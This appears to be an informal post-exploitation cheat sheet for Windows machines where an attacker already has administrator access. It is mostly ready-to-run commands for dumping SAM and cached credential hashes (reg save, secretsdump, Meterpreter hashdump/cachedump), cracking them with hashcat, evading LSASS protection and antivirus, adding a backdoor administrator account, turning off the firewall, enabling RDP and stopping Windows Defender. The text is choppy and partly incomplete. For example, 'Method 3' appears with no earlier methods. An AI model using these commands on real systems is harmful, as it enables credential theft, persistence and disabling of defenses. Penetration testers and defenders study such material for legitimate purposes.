This guide will ensure that you establish better persistence onto systems. It is also a very linear guide, which means that from top-to-bottom these are good practices to enable. Also these modules are AFTER ACHIEVING ADMINISTRATOR ACCESS.
Dumping Hashes
After Administrator access on a Windows computer we can proceed to dump hashes to open up the network to further attacks.
We can use the following hives as well to dump the hashes locally. This only requires the transfer of the SYSTEM, SAM, and SECURITY files onto our local machine. We could use whatever file transfer method is the most available to us.
reg.exe save hklm\system c:\Users\Administrator\system
reg.exe save hklm\security c:\Users\Administrator\security
reg.exe save hklm\sam c:\Users\Administrator\sam
Transfer them to our attacking machine.
secretsdump.py -sam sam -system system -security security LOCAL
Method 3: Meterpreter
Use the following modules
hashdump
use post/windows/gather/cachedump
Cracking NTLMv1 Hashes
hashcat -m 1000 <hash> rockyou.txt
Cracking Cached Domain Credentials
To crack using hashcat we must put in the following format:
$DCC2$10240#username#hash
Meterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to do it.
Windows made a protection to protect the dumping of hashes in LSASS, this one is a process that is called PPL, which stands for Protected Processes Light. Basically services run with different integrity levels, therefore we are not able to mess around with processes that have different higher integrity levels that we can touch.
Error
mimikatz # sekurlsa::logonpasswords
ERROR .... Handle on mmory (0x000000005)
Bypassing PPL
Since PPL is controlled by a kernel process. We can bypass this by writing in kernel level. We will be doing this by making use of the Admin privilege called SeLoadDriver Privilege.
There will be times that mimikatz will get picked up. We should first try to disable windows defender but lets say an anti virus keeps up with that bullshit we can dump the hashes offline. We will basically be doing more of what we did up there and transfer the a hive of the lsass process.
Transfer DMP file to our attacking windows machine.
Do the same for other processes who you have access to. This could hint to disablign certain things and other shit.
Persistence
Adding Administrator Users
net user lyethar pass123 /add
net localgroup Administrators lyethar /add
Then we can use psexec to log in.
Disable Firewall
NetSh Advfirewall set allprofiles state off
Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Disabling Windows Defender
Run the following command to disable Windows Defender:
sc stop WinDefend
To make sure that Windows Defender is stopped, run this command:
sc query WinDefend
To enable Windows defender again, run the following command:
sc start WinDefend
